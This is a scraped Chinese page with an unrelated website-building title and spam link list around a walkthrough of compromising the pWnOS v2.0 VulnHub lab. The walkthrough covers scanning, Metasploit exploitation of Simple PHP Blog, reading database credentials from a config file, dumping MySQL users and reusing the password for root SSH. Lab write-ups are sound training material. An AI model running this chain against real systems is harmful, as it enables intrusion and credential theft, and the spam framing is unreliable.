当前位置: 首页 > news >正文

人社门户网站建设方案非官方网站建设

人社门户网站建设方案,非官方网站建设,怎么做网站的外链,石家庄开发区网站建设知识点总结#xff1a; 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码#xff0c;查看模块信息 环境准备 攻击机#xff1a;kali2023 靶机#xff1a;pWnOS v2.0 安装地址#xff1a;pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到#xff0c;该靶… 知识点总结 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码查看模块信息 环境准备 攻击机kali2023 靶机pWnOS v2.0 安装地址pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到该靶机静态IP为10.10.10.100 所以我们就要修改虚拟机的虚拟网络编辑器 其次靶机的虚拟机设置如下 开始渗透 信息收集 收集IP(虽然已经知道了) arp-scan -l 端口扫描 先大概看一下 nmap 10.10.10.100 再详细看一下 nmap -A -p- 10.10.10.100看到内核版本等 访问一下80端口 扫一下目录 gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt扫到了/blog目录访问 查看源代码 查看到建立博客的模块模版是Simple PHP Blog 0.4.0 漏洞查找 msf查找有没有现成的漏洞 search Simple PHP Blog 0.4.0 存在那我们直接利用 use unix/webapp/sphpblog_file_upload set Rhost 10.10.10.100 set uri /blog //填有该模块的url此处写为uri run //运行 shell //开启命令行 python -c import pty;pty.spawn(/bin/bash) //优化命令行 提权 查看一下目录 存在文件mysqli_connect.php看看 拿到数据库root密码登录 看看能不能拿到相关账户密码分别执行下述命令爆库 show databases; use mysql; show tables; select * from user;最后看到 看到root的好多密码都是一致的具体解密我也不知道所以没有解密成功 但是我们可以用上面的那个密码再登录一下ssh试试 ssh root10.10.10.100 成功root
http://www.pierceye.com/news/113990/

相关文章:

  • 为网站网站做推广制作本地网页
  • 行业推广做哪个网站好wordpress升级后编辑器没有
  • 百度经验网站建设wordpress 获取插件目录
  • 班服定制的网站通过ip访问网站需要怎么做
  • 门户网站建设汇报如果在网上接网站建设项目
  • 网站开发文档是什么概念注册个体户
  • 双井做网站的公司app开发和网站开发价格
  • 电梯企业网站制作中山网站建设电话
  • 做网站推广哪些跨境电商平台企业
  • 域名注册网站推荐方案模板
  • 亚运村网站建设北京工商注册官网
  • sql2005做网站书店网站建设人员分配
  • 工商局网站怎么做股东实名认证石家庄网站建设公司怎么样
  • 做公众号的模版的网站国内网站做国外服务器
  • 做国际网站的上海高端网站公司wordpress 4.9.6 下载
  • 学校集约网站建设最牛餐饮营销手段
  • wordpress影视站网站太花哨
  • 青岛 机械 中企动力提供网站建设小说网站怎么做空间小
  • 通江县网站建设做网站到八方资源网怎么样
  • 国家网站建设ssh架构jsp网站开发
  • 浦东新区手机网站设计网络营销做得好的产品
  • 浙江市建设网站市场监督管理局电话举报电话
  • 企业网站的建设的功能定位菏泽百度推广公司电话
  • linux系统怎么做网站女生去住建局好不好
  • 自己搭建环境建设网站网站开发温州
  • 下沙做网站软件erp系统的主要功能
  • 郑州网站建设专家最新手机排行榜2021
  • 宠物店网站建设策划书重庆网站建设 红旗河沟
  • 一般网站自己可以做播放器吗最简单的一个网站开发
  • 网站的开发商务网站安全方案设计